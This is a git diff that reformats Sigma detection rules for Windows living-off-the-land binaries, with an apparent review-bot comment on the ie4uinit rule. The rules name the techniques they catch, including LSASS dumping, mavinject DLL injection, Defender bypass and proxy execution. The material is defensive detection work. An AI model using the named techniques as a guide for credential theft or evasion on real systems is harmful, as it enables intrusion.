@@ -1,8 +1,7 @@ title: Lolbin Defaultpack.exe Use As Proxy id: b2309017-4235-44fe-b5af-b15363011957 status: test -description: Detect usage of the "defaultpack.exe" binary as a proxy to launch other - programs +description: Detect usage of the "defaultpack.exe" binary as a proxy to launch other programs references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack/ - https://www.echotrail.io/insights/search/defaultpack.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml index ec909b9ee..b1c7bacd7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml @@ -1,8 +1,7 @@ title: DeviceCredentialDeployment Execution id: b8b1b304-a60f-4999-9a6e-c547bde03ffd status: test -description: Detects the execution of DeviceCredentialDeployment to hide a process - from view +description: Detects the execution of DeviceCredentialDeployment to hide a process from view references: - https://github.com/LOLBAS-Project/LOLBAS/pull/147 author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml index 1988cf2fc..02981fc7b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml @@ -21,7 +21,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \devtoolslauncher.exe - CommandLine|contains: LaunchForDeploy + CommandLine|contains: LaunchForDeploy condition: process_creation and selection falsepositives: - Legitimate use of devtoolslauncher.exe by legitimate user 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_diantz_ads.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_diantz_ads.yml index bd97423b2..48c056dd4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_diantz_ads.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_diantz_ads.yml @@ -1,8 +1,7 @@ title: Suspicious Diantz Alternate Data Stream Execution id: 6b369ced-4b1d-48f1-b427-fdc0de0790bd status: test -description: Compress target file into a cab file stored in the Alternate Data Stream - (ADS) of the target file. +description: Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file. references: - https://lolbas-project.github.io/lolbas/Binaries/Diantz/ author: frack113 @@ -20,10 +19,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - diantz.exe - .cab - CommandLine|re: :[^\\] + CommandLine|re: :[^\\] condition: process_creation and selection falsepositives: - Very Possible diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml index d52949af1..59c088b73 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml @@ -1,8 +1,7 @@ title: Suspicious Diantz Download and Compress Into a CAB File id: 185d7418-f250-42d0-b72e-0c8b70661e93 status: test -description: Download and compress a remote file and store it in a cab file on local - machine. +description: Download and compress a remote file and store it in a cab file on local machine. references: - https://lolbas-project.github.io/lolbas/Binaries/Diantz/ author: frack113 
@@ -20,7 +19,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - diantz.exe - ' \\\\' - .cab diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml index 79144b4f2..8cd585926 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml @@ -1,8 +1,7 @@ title: Xwizard DLL Sideloading id: 193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1 status: test -description: Detects the execution of Xwizard tool from the non-default directory - which can be used to sideload a custom xwizards.dll +description: Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll references: - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/ - http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/ diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_dotnet.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_dotnet.yml index e2e78a385..d94acf5cc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_dotnet.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_dotnet.yml @@ -21,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \dotnet.exe - - OriginalFileName: .NET Host + - Image|endswith: \dotnet.exe + - OriginalFileName: .NET Host selection_cli: - CommandLine|endswith: + CommandLine|endswith: - .dll - .csproj condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_dotnet_dump.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_dotnet_dump.yml index 1b0098450..e9b27f96c 100644 
--- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_dotnet_dump.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_dotnet_dump.yml @@ -1,8 +1,7 @@ title: Process Memory Dump Via Dotnet-Dump id: 53d8d3e1-ca33-4012-adf3-e05a4d652e34 status: experimental -description: Detects the execution of "dotnet-dump" with the "collect" flag. The execution - could indicate potential process dumping of critical processes such as LSASS +description: Detects the execution of "dotnet-dump" with the "collect" flag. The execution could indicate potential process dumping of critical processes such as LSASS references: - https://learn.microsoft.com/en-us/dotnet/core/diagnostics/dotnet-dump#dotnet-dump-collect - https://twitter.com/bohops/status/1635288066909966338 @@ -20,14 +19,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \dotnet-dump.exe - - OriginalFileName: dotnet-dump.dll + - Image|endswith: \dotnet-dump.exe + - OriginalFileName: dotnet-dump.dll selection_cli: - CommandLine|contains: collect + CommandLine|contains: collect condition: process_creation and (all of selection_*) falsepositives: - - Process dumping is the expected behavior of the tool. So false positives are - expected in legitimate usage. The PID/Process Name of the process being dumped - needs to be investigated + - Process dumping is the expected behavior of the tool. So false positives are expected in legitimate usage. The PID/Process Name of the process being dumped needs to be investigated level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_dump64.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_dump64.yml index b91bae1ea..fe97f2787 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_dump64.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_dump64.yml 
@@ -1,8 +1,7 @@ title: Suspicious Dump64.exe Execution id: 129966c9-de17-4334-a123-8b58172e664d status: test -description: Detects when a user bypasses Defender by renaming a tool to dump64.exe - and placing it in a Visual Studio folder +description: Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder references: - https://twitter.com/mrd0x/status/1460597833917251595 author: Austin Songer @austinsonger, Florian Roth @@ -22,13 +21,12 @@ detection: selection: Image|endswith: \dump64.exe procdump_flags: - CommandLine|contains: + CommandLine|contains: - ' -ma ' - accepteula filter: Image|contains: \Installer\Feedback\dump64.exe - condition: process_creation and (( selection and not filter ) or ( selection and - procdump_flags )) + condition: process_creation and (( selection and not filter ) or ( selection and procdump_flags )) falsepositives: - Dump64.exe in other folders than the excluded one level: high diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_extexport.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_extexport.yml index ffc291f64..a820834ac 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_extexport.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_extexport.yml @@ -1,8 +1,7 @@ title: Suspicious Extexport Execution id: fb0b815b-f5f6-4f50-970f-ffe21f253f7a status: test -description: Extexport.exe loads dll and is execute from other folder the original - path +description: Extexport.exe loads dll and is execute from other folder the original path references: - https://lolbas-project.github.io/lolbas/Binaries/Extexport/ author: frack113 
@@ -20,9 +19,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - CommandLine|contains: Extexport.exe - - Image|endswith: \Extexport.exe - - OriginalFileName: extexport.exe + - CommandLine|contains: Extexport.exe + - Image|endswith: \Extexport.exe + - OriginalFileName: extexport.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_extrac32.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_extrac32.yml index 2fae4015e..145f24de6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_extrac32.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_extrac32.yml @@ -19,13 +19,13 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_lolbas: - - CommandLine|contains: extrac32.exe - - Image|endswith: \extrac32.exe - - OriginalFileName: extrac32.exe + - CommandLine|contains: extrac32.exe + - Image|endswith: \extrac32.exe + - OriginalFileName: extrac32.exe selection_archive: - CommandLine|contains: .cab + CommandLine|contains: .cab selection_options: - CommandLine|contains: + CommandLine|contains: - /C - /Y - ' \\\\' diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_extrac32_ads.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_extrac32_ads.yml index fc8cc8408..ab2628cea 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_extrac32_ads.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_extrac32_ads.yml @@ -19,10 +19,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - extrac32.exe - .cab - CommandLine|re: :[^\\] + CommandLine|re: :[^\\] condition: process_creation and selection falsepositives: - Unknown 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_format.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_format.yml index cda12fced..f7124782c 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_format.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_format.yml @@ -1,9 +1,7 @@ title: Format.com FileSystem LOLBIN id: 9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60 status: test -description: Detects the execution of format.com with a suspicious filesystem selection - that could indicate a defense evasion activity in which format.com is used to - load malicious DLL files or other programs +description: Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs references: - https://twitter.com/0gtweet/status/1477925112561209344 - https://twitter.com/wdormann/status/1478011052130459653?s=20 @@ -21,9 +19,9 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \format.com - CommandLine|contains: '/fs:' + CommandLine|contains: '/fs:' filter: - CommandLine|contains: + CommandLine|contains: - /fs:FAT - /fs:exFAT - /fs:NTFS diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml index 7ec7e2b70..fe2278452 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml 
@@ -1,8 +1,7 @@ title: Use of FSharp Interpreters id: b96b2031-7c17-4473-afe7-a30ce714db29 status: test -description: The FSharp Interpreters, FsiAnyCpu.exe and FSi.exe, can be used for AWL - bypass and is listed in Microsoft recommended block rules. +description: The FSharp Interpreters, FsiAnyCpu.exe and FSi.exe, can be used for AWL bypass and is listed in Microsoft recommended block rules. references: - https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ @@ -22,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \fsianycpu.exe - - OriginalFileName: fsianycpu.exe - - Image|endswith: \fsi.exe - - OriginalFileName: fsi.exe + - Image|endswith: \fsianycpu.exe + - OriginalFileName: fsianycpu.exe + - Image|endswith: \fsi.exe + - OriginalFileName: fsi.exe condition: process_creation and selection falsepositives: - Legitimate use by a software developer. diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_ftp.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_ftp.yml index 77d7cdd2c..55c859044 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_ftp.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_ftp.yml @@ -1,8 +1,7 @@ title: LOLBIN Execution Of The FTP.EXE Binary id: 06b401f4-107c-4ff9-947f-9ec1e7649f1e status: test -description: Detects execution of ftp.exe script execution with the "-s" or "/s" flag - and any child processes ran by ftp.exe +description: Detects execution of ftp.exe script execution with the "-s" or "/s" flag and any child processes ran by ftp.exe references: - https://lolbas-project.github.io/lolbas/Binaries/Ftp/ author: Victor Sergeev, oscd.community 
@@ -24,10 +23,10 @@ detection: selection_parent: ParentImage|endswith: \ftp.exe selection_ftp_img: - - Image|endswith: \ftp.exe - - OriginalFileName: ftp.exe + - Image|endswith: \ftp.exe + - OriginalFileName: ftp.exe selection_ftp_cli: - CommandLine|contains: + CommandLine|contains: - '-s:' - '/s:' condition: process_creation and (selection_parent or all of selection_ftp_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_gather_network_info.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_gather_network_info.yml index 8fe7672bc..834f36266 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_gather_network_info.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_gather_network_info.yml @@ -1,13 +1,12 @@ title: Potential Reconnaissance Activity Via GatherNetworkInfo.VBS id: 575dce0c-8139-4e30-9295-1ee75969f7fe related: - - id: f92a6f1e-a512-4a15-9735-da09e78d7273 - type: similar - - id: 07aa184a-870d-413d-893a-157f317f6f58 - type: similar + - id: f92a6f1e-a512-4a15-9735-da09e78d7273 # FileCreate + type: similar + - id: 07aa184a-870d-413d-893a-157f317f6f58 # ProcCreation Susp + type: similar status: test -description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". - Which can be used to gather information about the target machine +description: Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine references: - https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs - https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government 
@@ -28,14 +27,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \cscript.exe - - \wscript.exe - - OriginalFileName: - - cscript.exe - - wscript.exe + - Image|endswith: + - \cscript.exe + - \wscript.exe + - OriginalFileName: + - cscript.exe + - wscript.exe selection_cli: - CommandLine|contains: gatherNetworkInfo.vbs + CommandLine|contains: gatherNetworkInfo.vbs condition: process_creation and (all of selection_*) falsepositives: - Administrative activity diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_gpscript.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_gpscript.yml index 807da8cc7..5cec36ce9 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_gpscript.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_gpscript.yml @@ -1,8 +1,7 @@ title: Gpscript Execution id: 1e59c230-6670-45bf-83b0-98903780607e status: experimental -description: Detects the execution of the LOLBIN gpscript, which executes logon or - startup scripts configured in Group Policy +description: Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy references: - https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/ - https://lolbas-project.github.io/lolbas/Binaries/Gpscript/ @@ -21,10 +20,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \gpscript.exe - - OriginalFileName: GPSCRIPT.EXE + - Image|endswith: \gpscript.exe + - OriginalFileName: GPSCRIPT.EXE selection_cli: - CommandLine|contains: + CommandLine|contains: - ' /logon' - ' /startup' filter_main_svchost: diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_ie4uinit.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_ie4uinit.yml index 226222aaa..0374cf6ae 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_ie4uinit.yml 
+++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_ie4uinit.yml @@ -1,8 +1,7 @@ title: Ie4uinit Lolbin Use From Invalid Path id: d3bf399f-b0cf-4250-8bb4-dfc192ab81dc status: test -description: Detect use of ie4uinit.exe to execute commands from a specially prepared - ie4uinit.inf file from a directory other than the usual directories +description: Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories references: - https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/ - https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ @@ -21,17 +20,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational lolbin: - - Image|endswith: \ie4uinit.exe - - OriginalFileName: IE4UINIT.EXE + - Image|endswith: \ie4uinit.exe + - OriginalFileName: IE4UINIT.EXE filter_correct: CurrentDirectory: - c:\windows\system32\ - c:\windows\sysWOW64\ filter_missing: - CurrentDirectory: null + CurrentDirectory: condition: process_creation and (lolbin and not 1 of filter_*) falsepositives: - - ViberPC updater calls this binary with the following commandline "ie4uinit.exe - -ClearIconCache" + - ViberPC updater calls this binary with the following commandline "ie4uinit.exe -ClearIconCache" level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_ilasm.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_ilasm.yml index 26968918e..6eb281d26 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_ilasm.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_ilasm.yml @@ -20,8 +20,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \ilasm.exe - - OriginalFileName: ilasm.exe + - Image|endswith: \ilasm.exe + - OriginalFileName: ilasm.exe condition: process_creation and selection falsepositives: - Unknown 
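Review bot: In the `@@ -21,17 +20,16 @@` hunk of proc_creation_win_lolbin_ie4uinit.yml, `filter_missing` now expresses the "CurrentDirectory absent" test as a bare key, `CurrentDirectory:`, where the old side spelled it `CurrentDirectory: null`. A plain empty scalar resolves to null in YAML, so the rule's match semantics should be unchanged, but the bare key reads like an unfinished entry rather than a deliberate null test, and it is the only non-whitespace change in this hunk. If the generator cannot emit the literal `null`, a trailing comment would keep the intent visible to the next reader: `CurrentDirectory: # empty scalar = null: matches events where the field is absent`. The `condition: ... not 1 of filter_*` line a few lines below is what relies on this selection, so a maintainer skimming the diff may otherwise read the change as a regression.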
diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_jsc.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_jsc.yml index f9cb6f4cf..911bb6a37 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_jsc.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_jsc.yml @@ -1,8 +1,7 @@ title: JSC Convert Javascript To Executable id: 52788a70-f1da-40dd-8fbd-73b5865d6568 status: test -description: Detects the execution of the LOLBIN jsc.exe used by .NET to compile javascript - code to .exe or .dll format +description: Detects the execution of the LOLBIN jsc.exe used by .NET to compile javascript code to .exe or .dll format references: - https://lolbas-project.github.io/lolbas/Binaries/Jsc/ author: frack113 @@ -20,7 +19,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \jsc.exe - CommandLine|contains: .js + CommandLine|contains: .js condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_kavremover.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_kavremover.yml index b4539da6e..78074137b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_kavremover.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_kavremover.yml 
@@ -1,9 +1,7 @@ title: Kavremover Dropped Binary LOLBIN Usage id: d047726b-c71c-4048-a99b-2e2f50dc107d status: test -description: Detects the execution of a signed binary dropped by Kaspersky Lab Products - Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands - and binaries. +description: Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries. references: - https://nasbench.medium.com/lolbined-using-kaspersky-endpoint-security-kes-installer-to-execute-arbitrary-commands-1c999f1b7fea author: Nasreddine Bencherchali (Nextron Systems) @@ -20,11 +18,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: ' run run-cmd ' + CommandLine|contains: ' run run-cmd ' filter: ParentImage|endswith: - - \kavremover.exe - - \cleanapi.exe + - \kavremover.exe # When launched from kavremover.exe + - \cleanapi.exe # When launched from KES installer condition: process_creation and (selection and not filter) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml index 844ca870c..a4ef44ea1 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml @@ -1,8 +1,7 @@ title: Launch-VsDevShell.PS1 Proxy Execution id: 45d3a03d-f441-458c-8883-df101a3bb146 status: test -description: Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script - to execute commands. +description: Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands. references: - https://twitter.com/nas_bench/status/1535981653239255040 author: Nasreddine Bencherchali (Nextron Systems) 
@@ -19,9 +18,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_script: - CommandLine|contains: Launch-VsDevShell.ps1 + CommandLine|contains: Launch-VsDevShell.ps1 selection_flags: - CommandLine|contains: + CommandLine|contains: - 'VsWherePath ' - 'VsInstallationPath ' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_manage_bde.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_manage_bde.yml index 23b3c23ff..5eabc0115 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_manage_bde.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_manage_bde.yml @@ -1,8 +1,7 @@ title: Potential Manage-bde.wsf Abuse To Proxy Execution id: c363385c-f75d-4753-a108-c1a8e28bdbda status: test -description: Detects potential abuse of the "manage-bde.wsf" script as a LOLBIN to - proxy execution +description: Detects potential abuse of the "manage-bde.wsf" script as a LOLBIN to proxy execution references: - https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/ - https://gist.github.com/bohops/735edb7494fe1bd1010d67823842b712 @@ -24,10 +23,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_wscript_img: - - Image|endswith: \wscript.exe - - OriginalFileName: wscript.exe + - Image|endswith: \wscript.exe + - OriginalFileName: wscript.exe selection_wscript_cli: - CommandLine|contains: manage-bde.wsf + CommandLine|contains: manage-bde.wsf selection_parent: ParentImage|endswith: - \cscript.exe @@ -35,8 +34,7 @@ detection: ParentCommandLine|contains: manage-bde.wsf selection_filter_cmd: Image|endswith: \cmd.exe - condition: process_creation and (all of selection_wscript_* or (selection_parent - and not selection_filter_cmd)) + condition: process_creation and (all of selection_wscript_* or (selection_parent and not selection_filter_cmd)) falsepositives: - Unlikely level: high 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml index 7f207e9b1..3fde71136 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml @@ -1,18 +1,17 @@ title: Mavinject Inject DLL Into Running Process id: 4f73421b-5a0b-4bbf-a892-5a7fb99bea66 related: - - id: 17eb8e57-9983-420d-ad8a-2c4976c22eb8 - type: obsoletes + - id: 17eb8e57-9983-420d-ad8a-2c4976c22eb8 + type: obsoletes status: test -description: Detects process injection using the signed Windows tool "Mavinject" via - the "INJECTRUNNING" flag +description: Detects process injection using the signed Windows tool "Mavinject" via the "INJECTRUNNING" flag references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.004/T1056.004.md - https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e - https://twitter.com/gN3mes1s/status/941315826107510784 - https://reaqta.com/2017/12/mavinject-microsoft-injector/ - - https://twitter.com/Hexacorn/status/776122138063409152 + - https://twitter.com/Hexacorn/status/776122138063409152 # Deleted tweet - https://github.com/SigmaHQ/sigma/issues/3742 - https://github.com/keyboardcrunch/SentinelOne-ATTACK-Queries/blob/6a228d23eefe963ca81f2d52f94b815f61ef5ee0/Tactics/DefenseEvasion.md#t1055-process-injection author: frack113, Florian Roth 
@@ -32,9 +31,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: ' /INJECTRUNNING ' + CommandLine|contains: ' /INJECTRUNNING ' filter: - ParentImage: C:\Windows\System32\AppVClient.exe + ParentImage: C:\Windows\System32\AppVClient.exe # This parent is the expected process to launch "mavinject" condition: process_creation and (selection and not filter) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_mpiexec.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_mpiexec.yml index 8ada4c4d8..27ab777df 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_mpiexec.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_mpiexec.yml @@ -1,8 +1,7 @@ title: MpiExec Lolbin id: 729ce0ea-5d8f-4769-9762-e35de441586d status: test -description: Detects a certain command line flag combination used by mpiexec.exe LOLBIN - from HPC pack that can be used to execute any other binary +description: Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary references: - https://twitter.com/mrd0x/status/1465058133303246867 - https://docs.microsoft.com/en-us/powershell/high-performance-computing/mpiexec?view=hpc19-ps @@ -22,11 +21,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_binary: - - Image|endswith: \mpiexec.exe - - Imphash: d8b52ef6aaa3a81501bdfff9dbb96217 - - Hashes|contains: IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217 + - Image|endswith: \mpiexec.exe + - Imphash: d8b52ef6aaa3a81501bdfff9dbb96217 + - Hashes|contains: IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217 selection_flags: - CommandLine|contains: + CommandLine|contains: - ' /n 1 ' - ' -n 1 ' condition: process_creation and (all of selection*) 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_msdeploy.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_msdeploy.yml index 9ed018ee5..d0c12c018 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_msdeploy.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_msdeploy.yml @@ -21,7 +21,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - verb:sync - -source:RunCommand - -dest:runCommand diff --git a/sigma/sysmon/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml b/sigma/sysmon/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml index 5488a576a..015d09727 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml @@ -1,9 +1,7 @@ title: Execute MSDT Via Answer File id: 9c8c7000-3065-44a8-a555-79bcba5d9955 status: test -description: Detects execution of "msdt.exe" using an answer file which is simulating - the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility - tab) +description: Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab) references: - https://lolbas-project.github.io/lolbas/Binaries/Msdt/ author: Nasreddine Bencherchali (Nextron Systems) @@ -22,9 +20,9 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_cli: Image|endswith: \msdt.exe - CommandLine|contains: \WINDOWS\diagnostics\index\PCWDiagnostic.xml + CommandLine|contains: \WINDOWS\diagnostics\index\PCWDiagnostic.xml selection_answer: - CommandLine|contains: + CommandLine|contains: - ' -af ' - ' /af ' filter: 
